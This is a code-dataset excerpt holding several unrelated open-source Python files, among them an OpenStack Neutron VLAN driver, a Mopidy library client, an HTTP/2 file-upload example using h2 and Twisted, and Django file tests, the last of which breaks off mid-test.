code
stringlengths 733
1.05M
|
---|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import sys
from neutron_lib import exceptions as exc
from oslo_config import cfg
from oslo_log import log
from six import moves
from neutron._i18n import _, _LE, _LI, _LW
from neutron.common import _deprecate
from neutron.conf.plugins.ml2.drivers import driver_type
from neutron.db import api as db_api
from neutron.db.models.plugins.ml2 import vlanallocation as vlan_alloc_model
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import helpers
LOG = log.getLogger(__name__)
_deprecate._moved_global('VlanAllocation', new_module=vlan_alloc_model)
driver_type.register_ml2_drivers_vlan_opts()
class VlanTypeDriver(helpers.SegmentTypeDriver):
"""Manage state for VLAN networks with ML2.
The VlanTypeDriver implements the 'vlan' network_type. VLAN
network segments provide connectivity between VMs and other
devices using any connected IEEE 802.1Q conformant
physical_network segmented into virtual networks via IEEE 802.1Q
headers. Up to 4094 VLAN network segments can exist on each
available physical_network.
"""
def __init__(self):
super(VlanTypeDriver, self).__init__(vlan_alloc_model.VlanAllocation)
self._parse_network_vlan_ranges()
def _parse_network_vlan_ranges(self):
try:
self.network_vlan_ranges = plugin_utils.parse_network_vlan_ranges(
cfg.CONF.ml2_type_vlan.network_vlan_ranges)
except Exception:
LOG.exception(_LE("Failed to parse network_vlan_ranges. "
"Service terminated!"))
sys.exit(1)
LOG.info(_LI("Network VLAN ranges: %s"), self.network_vlan_ranges)
@db_api.retry_db_errors
def _sync_vlan_allocations(self):
session = db_api.get_session()
with session.begin(subtransactions=True):
# get existing allocations for all physical networks
allocations = dict()
allocs = (session.query(vlan_alloc_model.VlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.physical_network not in allocations:
allocations[alloc.physical_network] = set()
allocations[alloc.physical_network].add(alloc)
# process vlan ranges for each configured physical network
for (physical_network,
vlan_ranges) in self.network_vlan_ranges.items():
# determine current configured allocatable vlans for
# this physical network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.range(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if physical_network in allocations:
for alloc in allocations[physical_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug("Removing vlan %(vlan_id)s on "
"physical network "
"%(physical_network)s from pool",
{'vlan_id': alloc.vlan_id,
'physical_network':
physical_network})
session.delete(alloc)
del allocations[physical_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = vlan_alloc_model.VlanAllocation(
physical_network=physical_network,
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# physical networks
for allocs in allocations.values():
for alloc in allocs:
if not alloc.allocated:
LOG.debug("Removing vlan %(vlan_id)s on physical "
"network %(physical_network)s from pool",
{'vlan_id': alloc.vlan_id,
'physical_network':
alloc.physical_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def initialize(self):
self._sync_vlan_allocations()
LOG.info(_LI("VlanTypeDriver initialization complete"))
def is_partial_segment(self, segment):
return segment.get(api.SEGMENTATION_ID) is None
def validate_provider_segment(self, segment):
physical_network = segment.get(api.PHYSICAL_NETWORK)
segmentation_id = segment.get(api.SEGMENTATION_ID)
if physical_network:
if physical_network not in self.network_vlan_ranges:
msg = (_("physical_network '%s' unknown "
" for VLAN provider network") % physical_network)
raise exc.InvalidInput(error_message=msg)
if segmentation_id:
if not plugin_utils.is_valid_vlan_tag(segmentation_id):
msg = (_("segmentation_id out of range (%(min)s through "
"%(max)s)") %
{'min': p_const.MIN_VLAN_TAG,
'max': p_const.MAX_VLAN_TAG})
raise exc.InvalidInput(error_message=msg)
elif segmentation_id:
msg = _("segmentation_id requires physical_network for VLAN "
"provider network")
raise exc.InvalidInput(error_message=msg)
for key, value in segment.items():
if value and key not in [api.NETWORK_TYPE,
api.PHYSICAL_NETWORK,
api.SEGMENTATION_ID]:
msg = _("%s prohibited for VLAN provider network") % key
raise exc.InvalidInput(error_message=msg)
def reserve_provider_segment(self, session, segment):
filters = {}
physical_network = segment.get(api.PHYSICAL_NETWORK)
if physical_network is not None:
filters['physical_network'] = physical_network
vlan_id = segment.get(api.SEGMENTATION_ID)
if vlan_id is not None:
filters['vlan_id'] = vlan_id
if self.is_partial_segment(segment):
alloc = self.allocate_partially_specified_segment(
session, **filters)
if not alloc:
raise exc.NoNetworkAvailable()
else:
alloc = self.allocate_fully_specified_segment(
session, **filters)
if not alloc:
raise exc.VlanIdInUse(**filters)
return {api.NETWORK_TYPE: p_const.TYPE_VLAN,
api.PHYSICAL_NETWORK: alloc.physical_network,
api.SEGMENTATION_ID: alloc.vlan_id,
api.MTU: self.get_mtu(alloc.physical_network)}
def allocate_tenant_segment(self, session):
alloc = self.allocate_partially_specified_segment(session)
if not alloc:
return
return {api.NETWORK_TYPE: p_const.TYPE_VLAN,
api.PHYSICAL_NETWORK: alloc.physical_network,
api.SEGMENTATION_ID: alloc.vlan_id,
api.MTU: self.get_mtu(alloc.physical_network)}
def release_segment(self, session, segment):
physical_network = segment[api.PHYSICAL_NETWORK]
vlan_id = segment[api.SEGMENTATION_ID]
ranges = self.network_vlan_ranges.get(physical_network, [])
inside = any(lo <= vlan_id <= hi for lo, hi in ranges)
with session.begin(subtransactions=True):
query = (session.query(vlan_alloc_model.VlanAllocation).
filter_by(physical_network=physical_network,
vlan_id=vlan_id))
if inside:
count = query.update({"allocated": False})
if count:
LOG.debug("Releasing vlan %(vlan_id)s on physical "
"network %(physical_network)s to pool",
{'vlan_id': vlan_id,
'physical_network': physical_network})
else:
count = query.delete()
if count:
LOG.debug("Releasing vlan %(vlan_id)s on physical "
"network %(physical_network)s outside pool",
{'vlan_id': vlan_id,
'physical_network': physical_network})
if not count:
LOG.warning(_LW("No vlan_id %(vlan_id)s found on physical "
"network %(physical_network)s"),
{'vlan_id': vlan_id,
'physical_network': physical_network})
def get_mtu(self, physical_network):
seg_mtu = super(VlanTypeDriver, self).get_mtu()
mtu = []
if seg_mtu > 0:
mtu.append(seg_mtu)
if physical_network in self.physnet_mtus:
mtu.append(int(self.physnet_mtus[physical_network]))
return min(mtu) if mtu else 0
_deprecate._MovedGlobals()
|
# coding: utf-8
'''
emailer.py
Contains Emailer class to aid with sending emails from templates
'''
import atexit
import logging
import smtplib
from jinja2 import Environment, PackageLoader
from email.mime.text import MIMEText
from nhtg15_webapp import app
class Emailer:
def __init__(self, app):
self.defaultfrom = app.config['EMAIL_FROM']
self.smtp_host = app.config['SMTP_HOST']
self.logger = logging.getLogger('nhtg15_webapp.emailer')
self.smtp = None
self.jinjaenv = None
atexit.register(self.shutdown)
def smtp_open(self):
try:
status = self.smtp.noop()[0]
except: # smtplib.SMTPServerDisconnected
status = -1
return True if status == 250 else False
def get_template(self, template):
if self.jinjaenv is None:
self.jinjaenv = Environment(
loader=PackageLoader(
'nhtg15_webapp',
'templates'
)
)
return self.jinjaenv.get_template(template)
def send_template(self, to, subject, template, **kwargs):
template = self.get_template(template)
try:
msgfrom = kwargs['email_from']
except KeyError:
msgfrom = self.defaultfrom
self.send_text(
to,
subject,
template.render(**kwargs),
msgfrom
)
def send_text(self, to, subject, text, msgfrom=None):
if msgfrom is None:
msgfrom = self.defaultfrom
msg = MIMEText(
text,
'plain',
'utf-8'
)
msg['Subject'] = ("[AllergenAlert] - " + subject)
msg['From'] = msgfrom
if isinstance(to, list):
for email in to:
msg['To'] = email
else:
msg['To'] = to
self.send_message(msg)
def send_message(self, msg):
if self.smtp is None or not self.smtp_open():
self.smtp = smtplib.SMTP(self.smtp_host)
try:
self.smtp.sendmail(msg['From'], msg.get_all('To'), msg.as_string())
except smtplib.SMTPRecipientsRefused as e:
self.logger.error(
(
'SMTP server at {0} refused recipients {1} refused for '
'message with subject {2}'
).format(
self.smtp_host,
e.recipients,
msg['Subject']
)
)
except smtplib.SMTPHeloError as e:
self.logger.error(
(
'SMTP server at {0} did not reply properly to HELO for '
'message with subject {1}'
).format(
self.smtp_host,
msg['Subject']
)
)
except smtplib.SMTPSenderRefused as e:
self.logger.error(
(
'SMTP server at {0} did not allow sender {1} for '
'message with subject {2}'
).format(
self.smtp_host,
msg['From'],
msg['Subject']
)
)
except smtplib.SMTPDataError as e:
self.logger.error(
(
'SMTP server at {0} responded with unexpected error code '
'{1} with error message {2} for message with subject {3}'
).format(
self.smtp_host,
e.smtp_code,
e.smtp_error,
msg['Subject']
)
)
def shutdown(self):
if self.smtp is not None and self.smtp_open():
self.smtp.quit()
EMAILER = Emailer(app.APP)
|
from ..mopidy_api import MopidyWSController
class LibraryController (MopidyWSController):
# DEPRECATED
def lookup(self, uri=None, uris=None, **options):
'''Lookup the given URIs.
If the URI expands to multiple tracks, the returned list will contain
them all.
:param uri: track URI
:type uri: string or :class:`None`
:param uris: track URIs
:type uris: list of string or :class:`None`
:rtype: list of :class:`mopidy.models.Track` if uri was set or
{uri: list of :class:`mopidy.models.Track`} if uris was set.
.. versionadded:: 1.0
The ``uris`` argument.
.. deprecated:: 1.0
The ``uri`` argument. Use ``uris`` instead.
'''
return self.mopidy_request('core.library.lookup', uri=uri, uris=uris, **options)
def refresh(self, uri=None, **options):
'''Refresh library. Limit to URI and below if an URI is given.
:param uri: directory or track URI
:type uri: string
'''
return self.mopidy_request('core.library.refresh', uri=uri, **options)
def get_images(self, uris, **options):
'''Lookup the images for the given URIs
Backends can use this to return image URIs for any URI they know about
be it tracks, albums, playlists... The lookup result is a dictionary
mapping the provided URIs to lists of images.
Unknown URIs or URIs the corresponding backend couldn't find anything
for will simply return an empty list for that URI.
:param uris: list of URIs to find images for
:type uris: list of string
:rtype: {uri: tuple of :class:`mopidy.models.Image`}
.. versionadded:: 1.0
'''
return self.mopidy_request('core.library.get_images', uris=uris, **options)
def get_distinct(self, field, query=None, **options):
'''List distinct values for a given field from the library.
This has mainly been added to support the list commands the MPD
protocol supports in a more sane fashion. Other frontends are not
recommended to use this method.
:param string field: One of ``track``, ``artist``, ``albumartist``,
``album``, ``composer``, ``performer``, ``date`` or ``genre``.
:param dict query: Query to use for limiting results, see
:meth:`search` for details about the query format.
:rtype: set of values corresponding to the requested field type.
.. versionadded:: 1.0
'''
return self.mopidy_request('core.library.get_distinct', field=field, query=query, **options)
# DEPRECATED
def search(self, query=None, uris=None, exact=False, **options):
'''Search the library for tracks where ``field`` contains ``values``.
If ``uris`` is given, the search is limited to results from within the
URI roots. For example passing ``uris=['file:']`` will limit the search
to the local backend.
Examples::
# Returns results matching 'a' in any backend
search({'any': ['a']})
# Returns results matching artist 'xyz' in any backend
search({'artist': ['xyz']})
# Returns results matching 'a' and 'b' and artist 'xyz' in any
# backend
search({'any': ['a', 'b'], 'artist': ['xyz']})
# Returns results matching 'a' if within the given URI roots
# "file:///media/music" and "spotify:"
search({'any': ['a']}, uris=['file:///media/music', 'spotify:'])
# Returns results matching artist 'xyz' and 'abc' in any backend
search({'artist': ['xyz', 'abc']})
:param query: one or more queries to search for
:type query: dict
:param uris: zero or more URI roots to limit the search to
:type uris: list of string or :class:`None`
:param exact: if the search should use exact matching
:type exact: :class:`bool`
:rtype: list of :class:`mopidy.models.SearchResult`
.. versionadded:: 1.0
The ``exact`` keyword argument, which replaces :meth:`find_exact`.
.. deprecated:: 1.0
Previously, if the query was empty, and the backend could support
it, all available tracks were returned. This has not changed, but
it is strongly discouraged. No new code should rely on this
behavior.
.. deprecated:: 1.1
Providing the search query via ``kwargs`` is no longer supported.
'''
return self.mopidy_request('core.library.search', query=query, uris=uris, exact=exact, **options)
# DEPRECATED
def find_exact(self, query=None, uris=None, **options):
'''Search the library for tracks where ``field`` is ``values``.
.. deprecated:: 1.0
Use :meth:`search` with ``exact`` set.
'''
return self.mopidy_request('core.library.find_exact', query=query, uris=uris, **options)
def browse(self, uri, **options):
'''Browse directories and tracks at the given ``uri``.
``uri`` is a string which represents some directory belonging to a
backend. To get the intial root directories for backends pass
:class:`None` as the URI.
Returns a list of :class:`mopidy.models.Ref` objects for the
directories and tracks at the given ``uri``.
The :class:`~mopidy.models.Ref` objects representing tracks keep the
track's original URI. A matching pair of objects can look like this::
Track(uri='dummy:/foo.mp3', name='foo', artists=..., album=...)
Ref.track(uri='dummy:/foo.mp3', name='foo')
The :class:`~mopidy.models.Ref` objects representing directories have
backend specific URIs. These are opaque values, so no one but the
backend that created them should try and derive any meaning from them.
The only valid exception to this is checking the scheme, as it is used
to route browse requests to the correct backend.
For example, the dummy library's ``/bar`` directory could be returned
like this::
Ref.directory(uri='dummy:directory:/bar', name='bar')
:param string uri: URI to browse
:rtype: list of :class:`mopidy.models.Ref`
.. versionadded:: 0.18
'''
return self.mopidy_request('core.library.browse', uri=uri, **options)
|
from __future__ import absolute_import
from itertools import cycle
import logging
import random
import six
from six.moves import xrange
from .base import Producer
log = logging.getLogger(__name__)
class SimpleProducer(Producer):
"""A simple, round-robin producer.
See Producer class for Base Arguments
Additional Arguments:
random_start (bool, optional): randomize the initial partition which
the first message block will be published to, otherwise
if false, the first message block will always publish
to partition 0 before cycling through each partition,
defaults to True.
"""
def __init__(self, *args, **kwargs):
self.partition_cycles = {}
self.random_start = kwargs.pop('random_start', True)
super(SimpleProducer, self).__init__(*args, **kwargs)
def _next_partition(self, topic):
if topic not in self.partition_cycles:
if not self.client.has_metadata_for_topic(topic):
self.client.load_metadata_for_topics(topic)
self.partition_cycles[topic] = cycle(self.client.get_partition_ids_for_topic(topic))
# Randomize the initial partition that is returned
if self.random_start:
num_partitions = len(self.client.get_partition_ids_for_topic(topic))
for _ in xrange(random.randint(0, num_partitions-1)):
next(self.partition_cycles[topic])
return next(self.partition_cycles[topic])
def send_messages(self, topic, *msg):
if not isinstance(topic, six.binary_type):
topic = topic.encode('utf-8')
partition = self._next_partition(topic)
return super(SimpleProducer, self).send_messages(
topic, partition, *msg
)
def __repr__(self):
return '<SimpleProducer batch=%s>' % self.async
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SelectByExpression.py
---------------------
Date : July 2014
Copyright : (C) 2014 by Michaël Douchin
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Michael Douchin'
__date__ = 'July 2014'
__copyright__ = '(C) 2014, Michael Douchin'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import processing
from qgis.core import QgsExpression, QgsFeatureRequest
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.core.parameters import ParameterVector
from processing.core.parameters import ParameterSelection
from processing.core.outputs import OutputVector
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.parameters import ParameterString
class SelectByExpression(GeoAlgorithm):
LAYERNAME = 'LAYERNAME'
EXPRESSION= 'EXPRESSION'
RESULT = 'RESULT'
METHOD = 'METHOD'
METHODS = ['creating new selection', 'adding to current selection',
'removing from current selection']
def defineCharacteristics(self):
self.name = 'Select by expression'
self.group = 'Vector selection tools'
self.addParameter(ParameterVector(self.LAYERNAME,
self.tr('Input Layer'), [ParameterVector.VECTOR_TYPE_ANY]))
self.addParameter(ParameterString(self.EXPRESSION,
self.tr("Expression")))
self.addParameter(ParameterSelection(self.METHOD,
self.tr('Modify current selection by'), self.METHODS, 0))
self.addOutput(OutputVector(self.RESULT, self.tr('Selected (expression)'), True))
def processAlgorithm(self, progress):
filename = self.getParameterValue(self.LAYERNAME)
layer = processing.getObject(filename)
oldSelection = set(layer.selectedFeaturesIds())
method = self.getParameterValue(self.METHOD)
# Build QGIS request with expression
expression = self.getParameterValue(self.EXPRESSION)
qExp = QgsExpression(expression)
if not qExp.hasParserError():
qReq = QgsFeatureRequest(qExp)
else:
raise GeoAlgorithmExecutionException(qExp.parserErrorString())
selected = [f.id() for f in layer.getFeatures(qReq)]
if method == 1:
selected = list(oldSelection.union(selected))
elif method == 2:
selected = list(oldSelection.difference(selected))
# Set the selection
layer.setSelectedFeatures(selected)
self.setOutputValue(self.RESULT, filename)
|
from __future__ import unicode_literals
from django.contrib.gis import feeds
from .models import City
class TestGeoRSS1(feeds.Feed):
link = '/city/'
title = 'Test GeoDjango Cities'
def items(self):
return City.objects.all()
def item_link(self, item):
return '/city/%s/' % item.pk
def item_geometry(self, item):
return item.point
class TestGeoRSS2(TestGeoRSS1):
def geometry(self, obj):
# This should attach a <georss:box> element for the extent of
# of the cities in the database. This tuple came from
# calling `City.objects.aggregate(Extent())` -- we can't do that call
# here because `Extent` is not implemented for MySQL/Oracle.
return (-123.30, -41.32, 174.78, 48.46)
def item_geometry(self, item):
# Returning a simple tuple for the geometry.
return item.point.x, item.point.y
class TestGeoAtom1(TestGeoRSS1):
feed_type = feeds.GeoAtom1Feed
class TestGeoAtom2(TestGeoRSS2):
feed_type = feeds.GeoAtom1Feed
def geometry(self, obj):
# This time we'll use a 2-tuple of coordinates for the box.
return ((-123.30, -41.32), (174.78, 48.46))
class TestW3CGeo1(TestGeoRSS1):
feed_type = feeds.W3CGeoFeed
# The following feeds are invalid, and will raise exceptions.
class TestW3CGeo2(TestGeoRSS2):
feed_type = feeds.W3CGeoFeed
class TestW3CGeo3(TestGeoRSS1):
feed_type = feeds.W3CGeoFeed
def item_geometry(self, item):
from django.contrib.gis.geos import Polygon
return Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
# The feed dictionary to use for URLs.
feed_dict = {
'rss1': TestGeoRSS1,
'rss2': TestGeoRSS2,
'atom1': TestGeoAtom1,
'atom2': TestGeoAtom2,
'w3cgeo1': TestW3CGeo1,
'w3cgeo2': TestW3CGeo2,
'w3cgeo3': TestW3CGeo3,
}
|
#!/usr/bin/env python3
#encoding=utf-8
'''
显示Library文件夹下图片
'''
import os
from PyQt5.QtCore import Qt, pyqtSignal, pyqtSlot
from PyQt5.QtWidgets import QWidget, QSizePolicy
from .ui_LibraryTab import Ui_Tab
from .GridWidget import GridWidget
from utils import getPasswordInput
from utils.logUtils import Log
class LibraryTab(QWidget, Ui_Tab):
# property
columnSize = 3
# signals
passwordEntered = pyqtSignal(str)
def __init__(self, parent=None):
super().__init__(parent)
# setup widgets
self.setupUi(self)
self.btn_enterPassword.clicked.connect(
self.btn_enterPassword_clicked
)
@pyqtSlot()
def btn_enterPassword_clicked(self):
password, isOK = getPasswordInput(self)
if isOK:
Log.d('Password is:{}'.format(password))
self.passwordEntered.emit(password)
def setLibraryPath(self, libpath):
self.libpath = libpath
def refresh(self):
libfiles = []
for filename in os.listdir(self.libpath):
if filename.endswith('jpeg') or filename.endswith('.jpg'):
libfiles.append(os.path.join(self.libpath, filename))
Log.i('files in library:{}'.format(libfiles))
self.libraryWidgets = []
sp = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
sp.setHorizontalStretch(0)
sp.setVerticalStretch(0)
i = -1 # init i in case of libfiles is []
for i, filepath in enumerate(libfiles):
col = i % self.columnSize
row = i // self.columnSize
widget = GridWidget(self.scrollAreaWidgetContents)
sp.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())
widget.setSizePolicy(sp)
widget.setContent(filepath, (250, 250))
self.gridLayout.addWidget(
widget, row, col, Qt.AlignHCenter | Qt.AlignVCenter
)
self.libraryWidgets.append(widget)
while i < 11:
i += 1
col = i % self.columnSize
row = i // self.columnSize
widget = GridWidget(self.scrollAreaWidgetContents)
sp.setHeightForWidth(widget.sizePolicy().hasHeightForWidth())
widget.setSizePolicy(sp)
widget.setContent('', None)
self.gridLayout.addWidget(
widget, row, col, Qt.AlignHCenter | Qt.AlignVCenter
)
self.libraryWidgets.append(widget)
|
# -*- coding: utf-8 -*-
"""
post_request.py
~~~~~~~~~~~~~~~
A short example that demonstrates a client that makes POST requests to certain
websites.
This example is intended to demonstrate how to handle uploading request bodies.
In this instance, a file will be uploaded. In order to handle arbitrary files,
this example also demonstrates how to obey HTTP/2 flow control rules.
Takes one command-line argument: a path to a file in the filesystem to upload.
If none is present, uploads this file.
"""
from __future__ import print_function
import mimetypes
import os
import sys
from twisted.internet import reactor, defer
from twisted.internet.endpoints import connectProtocol, SSL4ClientEndpoint
from twisted.internet.protocol import Protocol
from twisted.internet.ssl import optionsForClientTLS
from h2.connection import H2Connection
from h2.events import (
ResponseReceived, DataReceived, StreamEnded, StreamReset, WindowUpdated,
SettingsAcknowledged,
)
AUTHORITY = u'nghttp2.org'
PATH = '/httpbin/post'
class H2Protocol(Protocol):
def __init__(self, file_path):
self.conn = H2Connection()
self.known_proto = None
self.request_made = False
self.request_complete = False
self.file_path = file_path
self.flow_control_deferred = None
self.fileobj = None
self.file_size = None
def connectionMade(self):
"""
Called by Twisted when the TCP connection is established. We can start
sending some data now: we should open with the connection preamble.
"""
self.conn.initiate_connection()
self.transport.write(self.conn.data_to_send())
def dataReceived(self, data):
"""
Called by Twisted when data is received on the connection.
We need to check a few things here. Firstly, we want to validate that
we actually negotiated HTTP/2: if we didn't, we shouldn't proceed!
Then, we want to pass the data to the protocol stack and check what
events occurred.
"""
if not self.known_proto:
self.known_proto = self.transport.negotiatedProtocol
assert self.known_proto == b'h2'
events = self.conn.receive_data(data)
for event in events:
if isinstance(event, ResponseReceived):
self.handleResponse(event.headers)
elif isinstance(event, DataReceived):
self.handleData(event.data)
elif isinstance(event, StreamEnded):
self.endStream()
elif isinstance(event, SettingsAcknowledged):
self.settingsAcked(event)
elif isinstance(event, StreamReset):
reactor.stop()
raise RuntimeError("Stream reset: %d" % event.error_code)
elif isinstance(event, WindowUpdated):
self.windowUpdated(event)
data = self.conn.data_to_send()
if data:
self.transport.write(data)
def settingsAcked(self, event):
"""
Called when the remote party ACKs our settings. We send a SETTINGS
frame as part of the preamble, so if we want to be very polite we can
wait until the ACK for that frame comes before we start sending our
request.
"""
if not self.request_made:
self.sendRequest()
def handleResponse(self, response_headers):
"""
Handle the response by printing the response headers.
"""
for name, value in response_headers:
print("%s: %s" % (name.decode('utf-8'), value.decode('utf-8')))
print("")
def handleData(self, data):
"""
We handle data that's received by just printing it.
"""
print(data, end='')
def endStream(self):
"""
We call this when the stream is cleanly ended by the remote peer. That
means that the response is complete.
Because this code only makes a single HTTP/2 request, once we receive
the complete response we can safely tear the connection down and stop
the reactor. We do that as cleanly as possible.
"""
self.request_complete = True
self.conn.close_connection()
self.transport.write(self.conn.data_to_send())
self.transport.loseConnection()
def windowUpdated(self, event):
"""
We call this when the flow control window for the connection or the
stream has been widened. If there's a flow control deferred present
(that is, if we're blocked behind the flow control), we fire it.
Otherwise, we do nothing.
"""
if self.flow_control_deferred is None:
return
# Make sure we remove the flow control deferred to avoid firing it
# more than once.
flow_control_deferred = self.flow_control_deferred
self.flow_control_deferred = None
flow_control_deferred.callback(None)
def connectionLost(self, reason=None):
"""
Called by Twisted when the connection is gone. Regardless of whether
it was clean or not, we want to stop the reactor.
"""
if self.fileobj is not None:
self.fileobj.close()
if reactor.running:
reactor.stop()
def sendRequest(self):
"""
Send the POST request.
A POST request is made up of one headers frame, and then 0+ data
frames. This method begins by sending the headers, and then starts a
series of calls to send data.
"""
# First, we need to work out how large the file is.
self.file_size = os.stat(self.file_path).st_size
# Next, we want to guess a content-type and content-encoding.
content_type, content_encoding = mimetypes.guess_type(self.file_path)
# Now we can build a header block.
request_headers = [
(':method', 'POST'),
(':authority', AUTHORITY),
(':scheme', 'https'),
(':path', PATH),
('content-length', str(self.file_size)),
]
if content_type is not None:
request_headers.append(('content-type', content_type))
if content_encoding is not None:
request_headers.append(('content-encoding', content_encoding))
self.conn.send_headers(1, request_headers)
self.request_made = True
# We can now open the file.
self.fileobj = open(self.file_path, 'rb')
# We now need to send all the relevant data. We do this by checking
# what the acceptable amount of data is to send, and sending it. If we
# find ourselves blocked behind flow control, we then place a deferred
# and wait until that deferred fires.
self.sendFileData()
def sendFileData(self):
"""
Send some file data on the connection.
"""
# Firstly, check what the flow control window is for stream 1.
window_size = self.conn.local_flow_control_window(stream_id=1)
# Next, check what the maximum frame size is.
max_frame_size = self.conn.max_outbound_frame_size
# We will send no more than the window size or the remaining file size
# of data in this call, whichever is smaller.
bytes_to_send = min(window_size, self.file_size)
# We now need to send a number of data frames.
while bytes_to_send > 0:
chunk_size = min(bytes_to_send, max_frame_size)
data_chunk = self.fileobj.read(chunk_size)
self.conn.send_data(stream_id=1, data=data_chunk)
bytes_to_send -= chunk_size
self.file_size -= chunk_size
# We've prepared a whole chunk of data to send. If the file is fully
# sent, we also want to end the stream: we're done here.
if self.file_size == 0:
self.conn.end_stream(stream_id=1)
else:
# We've still got data left to send but the window is closed. Save
# a Deferred that will call us when the window gets opened.
self.flow_control_deferred = defer.Deferred()
self.flow_control_deferred.addCallback(self.sendFileData)
self.transport.write(self.conn.data_to_send())
try:
filename = sys.argv[1]
except IndexError:
filename = __file__
options = optionsForClientTLS(
hostname=AUTHORITY,
acceptableProtocols=[b'h2'],
)
connectProtocol(
SSL4ClientEndpoint(reactor, AUTHORITY, 443, options),
H2Protocol(filename)
)
reactor.run()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import gzip
import os
import struct
import tempfile
import unittest
from io import BytesIO, StringIO, TextIOWrapper
from django.core.files import File
from django.core.files.base import ContentFile
from django.core.files.move import file_move_safe
from django.core.files.temp import NamedTemporaryFile
from django.core.files.uploadedfile import SimpleUploadedFile, UploadedFile
from django.test import mock
from django.utils import six
from django.utils._os import upath
try:
from PIL import Image
except ImportError:
Image = None
else:
from django.core.files import images
class FileTests(unittest.TestCase):
def test_unicode_uploadedfile_name(self):
uf = UploadedFile(name='¿Cómo?', content_type='text')
self.assertIs(type(repr(uf)), str)
def test_unicode_file_name(self):
f = File(None, 'djángö')
self.assertIs(type(repr(f)), str)
def test_context_manager(self):
orig_file = tempfile.TemporaryFile()
base_file = File(orig_file)
with base_file as f:
self.assertIs(base_file, f)
self.assertFalse(f.closed)
self.assertTrue(f.closed)
self.assertTrue(orig_file.closed)
def test_namedtemporaryfile_closes(self):
"""
The symbol django.core.files.NamedTemporaryFile is assigned as
a different class on different operating systems. In
any case, the result should minimally mock some of the API of
tempfile.NamedTemporaryFile from the Python standard library.
"""
tempfile = NamedTemporaryFile()
self.assertTrue(hasattr(tempfile, "closed"))
self.assertFalse(tempfile.closed)
tempfile.close()
self.assertTrue(tempfile.closed)
def test_file_mode(self):
# Should not set mode to None if it is not present.
# See #14681, stdlib gzip module crashes if mode is set to None
file = SimpleUploadedFile("mode_test.txt", b"content")
self.assertFalse(hasattr(file, 'mode'))
gzip.GzipFile(fileobj=file)
def test_file_iteration(self):
"""
File objects should yield lines when iterated over.
Refs #22107.
"""
file = File(BytesIO(b'one\ntwo\nthree'))
self.assertEqual(list(file), [b'one\n', b'two\n', b'three'])
def test_file_iteration_windows_newlines(self):
"""
#8149 - File objects with \r\n line endings should yield lines
when iterated over.
"""
f = File(BytesIO(b'one\r\ntwo\r\nthree'))
self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three'])
def test_file_iteration_mac_newlines(self):
"""
#8149 - File objects with \r line endings should yield lines
when iterated over.
"""
f = File(BytesIO(b'one\rtwo\rthree'))
self.assertEqual(list(f), [b'one\r', b'two\r', b'three'])
def test_file_iteration_mixed_newlines(self):
f = File(BytesIO(b'one\rtwo\nthree\r\nfour'))
self.assertEqual(list(f), [b'one\r', b'two\n', b'three\r\n', b'four'])
def test_file_iteration_with_unix_newline_at_chunk_boundary(self):
f = File(BytesIO(b'one\ntwo\nthree'))
# Set chunk size to create a boundary after \n:
# b'one\n...
# ^
f.DEFAULT_CHUNK_SIZE = 4
self.assertEqual(list(f), [b'one\n', b'two\n', b'three'])
def test_file_iteration_with_windows_newline_at_chunk_boundary(self):
f = File(BytesIO(b'one\r\ntwo\r\nthree'))
# Set chunk size to create a boundary between \r and \n:
# b'one\r\n...
# ^
f.DEFAULT_CHUNK_SIZE = 4
self.assertEqual(list(f), [b'one\r\n', b'two\r\n', b'three'])
def test_file_iteration_with_mac_newline_at_chunk_boundary(self):
f = File(BytesIO(b'one\rtwo\rthree'))
# Set chunk size to create a boundary after \r:
# b'one\r...
# ^
f.DEFAULT_CHUNK_SIZE = 4
self.assertEqual(list(f), [b'one\r', b'two\r', b'three'])
def test_file_iteration_with_text(self):
f = File(StringIO('one\ntwo\nthree'))
self.assertEqual(list(f), ['one\n', 'two\n', 'three'])
def test_readable(self):
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
self.assertTrue(test_file.readable())
self.assertFalse(test_file.readable())
def test_writable(self):
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
self.assertTrue(test_file.writable())
self.assertFalse(test_file.writable())
with tempfile.TemporaryFile('rb') as temp, File(temp, name='something.txt') as test_file:
self.assertFalse(test_file.writable())
def test_seekable(self):
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
self.assertTrue(test_file.seekable())
self.assertFalse(test_file.seekable())
def test_io_wrapper(self):
content = "vive l'été\n"
with tempfile.TemporaryFile() as temp, File(temp, name='something.txt') as test_file:
test_file.write(content.encode('utf-8'))
test_file.seek(0)
